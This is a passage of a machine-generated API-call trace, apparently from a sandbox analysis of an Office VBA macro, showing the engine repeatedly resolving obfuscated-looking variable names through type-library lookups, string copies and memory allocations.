lpMultiByteStr=0x3a61a06, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="r_AAAAA") returned 8 [0068.948] ITypeComp:RemoteBind (in: This=0x665bd30, szName="r_AAAAA", lHashVal=0x105103, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="r_AAAAA") returned 0x105103 [0068.948] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="r_AAAAA" | out: _Dst="r_AAAAA") returned 0x0 [0068.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="r_AAAAA") returned 8 [0068.948] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.948] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="r_AAAAA", lHashVal=0x105103, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.948] IUnknown:Release (This=0x665ba50) returned 0xd [0068.949] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.949] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="r_AAAAA", lHashVal=0x105103, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.949] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.949] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.949] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="r_AAAAA", lHashVal=0x105103, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.949] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.949] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.949] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="r_AAAAA", lHashVal=0x105103, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.949] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61a06, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="r_AAAAA") returned 8 [0068.949] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="r_AAAAA", lHashVal=0x105103, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.949] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.949] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61a06 | out: _Dst=0x67c2d40) returned 0x0 [0068.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_r_AAAAA") returned 0x105487 [0068.949] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_r_AAAAA" | out: _Dst="_B_var_r_AAAAA") returned 0x0 [0068.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_r_AAAAA") returned 15 [0068.949] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.949] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_r_AAAAA", lHashVal=0x105487, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.949] IUnknown:Release (This=0x665ba50) returned 0xd [0068.949] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.949] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_r_AAAAA", lHashVal=0x105487, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.949] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.949] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.949] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_r_AAAAA", lHashVal=0x105487, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.949] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.949] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.949] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_r_AAAAA", lHashVal=0x105487, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.949] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.949] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.950] IUnknown:Release (This=0x665ba50) returned 0xd [0068.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1052e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_r_AAAAA") returned 15 [0068.950] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_r_AAAAA", lHashVal=0x105487, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.950] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61a06 | out: _Dst=0x144ec0) returned 0x0 [0068.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61a2e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="oDCAoAk") returned 8 [0068.950] ITypeComp:RemoteBind (in: This=0x665ba60, szName="oDCAoAk", lHashVal=0x10a3a0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61a2e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="oDCAoAk") returned 8 [0068.950] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="oDCAoAk", lHashVal=0x10a3a0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61a2e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="oDCAoAk") returned 8 [0068.950] ITypeComp:RemoteBind (in: This=0x665bd30, szName="oDCAoAk", lHashVal=0x10a3a0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oDCAoAk") returned 0x10a3a0 [0068.950] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="oDCAoAk" | out: _Dst="oDCAoAk") returned 0x0 [0068.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="oDCAoAk") returned 8 [0068.950] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.950] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="oDCAoAk", lHashVal=0x10a3a0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.950] IUnknown:Release (This=0x665ba50) returned 0xd [0068.950] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.950] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="oDCAoAk", lHashVal=0x10a3a0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.950] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.950] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.951] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="oDCAoAk", lHashVal=0x10a3a0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.951] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.951] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.951] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="oDCAoAk", lHashVal=0x10a3a0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.951] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61a2e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="oDCAoAk") returned 8 [0068.951] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="oDCAoAk", lHashVal=0x10a3a0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.951] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.951] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61a2e | out: _Dst=0x67c2d40) returned 0x0 [0068.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_oDCAoAk") returned 0x10a724 [0068.951] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_oDCAoAk" | out: _Dst="_B_var_oDCAoAk") returned 0x0 [0068.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_oDCAoAk") returned 15 [0068.951] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.951] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_oDCAoAk", lHashVal=0x10a724, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.951] IUnknown:Release (This=0x665ba50) returned 0xd [0068.951] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.951] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_oDCAoAk", lHashVal=0x10a724, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.951] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.951] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.951] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_oDCAoAk", lHashVal=0x10a724, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.951] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.951] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.951] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_oDCAoAk", lHashVal=0x10a724, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.951] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.951] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.951] IUnknown:Release (This=0x665ba50) returned 0xd [0068.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1055e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_oDCAoAk") returned 15 [0068.951] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_oDCAoAk", lHashVal=0x10a724, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0) returned 0x0 [0068.952] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61a2e | out: _Dst=0x144ec0) returned 0x0 [0068.952] ITypeComp:RemoteBind (in: This=0x665ba60, szName="oA1_AAAk", lHashVal=0x102cc0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61a56, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="oA1_AAAk") returned 9 [0068.952] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="oA1_AAAk", lHashVal=0x102cc0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61a56, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="oA1_AAAk") returned 9 [0068.952] ITypeComp:RemoteBind (in: This=0x665bd30, szName="oA1_AAAk", lHashVal=0x102cc0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oA1_AAAk") returned 0x102cc0 [0068.952] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="oA1_AAAk" | out: _Dst="oA1_AAAk") returned 0x0 [0068.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="oA1_AAAk") returned 9 [0068.952] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.952] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="oA1_AAAk", lHashVal=0x102cc0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.952] IUnknown:Release (This=0x665ba50) returned 0xd [0068.952] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.952] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="oA1_AAAk", lHashVal=0x102cc0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.952] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.952] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.952] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="oA1_AAAk", lHashVal=0x102cc0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.952] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.952] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.952] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="oA1_AAAk", lHashVal=0x102cc0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.952] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61a56, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="oA1_AAAk") returned 9 [0068.952] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="oA1_AAAk", lHashVal=0x102cc0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.953] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.953] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61a56 | out: _Dst=0x67c2d40) returned 0x0 [0068.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_oA1_AAAk") returned 0x100449 [0068.953] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_oA1_AAAk" | out: _Dst="_B_var_oA1_AAAk") returned 0x0 [0068.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_oA1_AAAk") returned 16 [0068.953] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.953] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_oA1_AAAk", lHashVal=0x100449, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.953] IUnknown:Release (This=0x665ba50) returned 0xd [0068.953] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.953] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_oA1_AAAk", lHashVal=0x100449, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.953] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.953] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.953] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_oA1_AAAk", lHashVal=0x100449, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.953] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.953] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.953] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_oA1_AAAk", lHashVal=0x100449, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.953] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.953] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.953] IUnknown:Release (This=0x665ba50) returned 0xd [0068.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1058e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_oA1_AAAk") returned 16 [0068.953] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_oA1_AAAk", lHashVal=0x100449, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x41005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x41005f00000000, pDummy=0x0) returned 0x0 [0068.953] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61a56 | out: _Dst=0x144ec0) returned 0x0 [0068.953] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wAoGAQAD", lHashVal=0x107231, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61a82, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wAoGAQAD") returned 9 [0068.953] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wAoGAQAD", lHashVal=0x107231, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61a82, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wAoGAQAD") returned 9 [0068.954] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wAoGAQAD", lHashVal=0x107231, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wAoGAQAD") returned 0x107231 [0068.954] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wAoGAQAD" | out: _Dst="wAoGAQAD") returned 0x0 [0068.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wAoGAQAD") returned 9 [0068.954] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.954] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wAoGAQAD", lHashVal=0x107231, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.954] IUnknown:Release (This=0x665ba50) returned 0xd [0068.954] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.954] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wAoGAQAD", lHashVal=0x107231, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.954] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.954] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.954] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wAoGAQAD", lHashVal=0x107231, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.954] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.954] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.954] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wAoGAQAD", lHashVal=0x107231, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.954] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61a82, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wAoGAQAD") returned 9 [0068.954] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wAoGAQAD", lHashVal=0x107231, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.954] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.954] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61a82 | out: _Dst=0x67c2d40) returned 0x0 [0068.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wAoGAQAD") returned 0x1049ba [0068.955] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wAoGAQAD" | out: _Dst="_B_var_wAoGAQAD") returned 0x0 [0068.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wAoGAQAD") returned 16 [0068.955] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.955] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wAoGAQAD", lHashVal=0x1049ba, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.955] IUnknown:Release (This=0x665ba50) returned 0xd [0068.955] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.955] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wAoGAQAD", lHashVal=0x1049ba, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.955] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.955] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.955] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wAoGAQAD", lHashVal=0x1049ba, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.955] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.955] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.955] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wAoGAQAD", lHashVal=0x1049ba, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.955] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.955] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.955] IUnknown:Release (This=0x665ba50) returned 0xd [0068.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b105be, 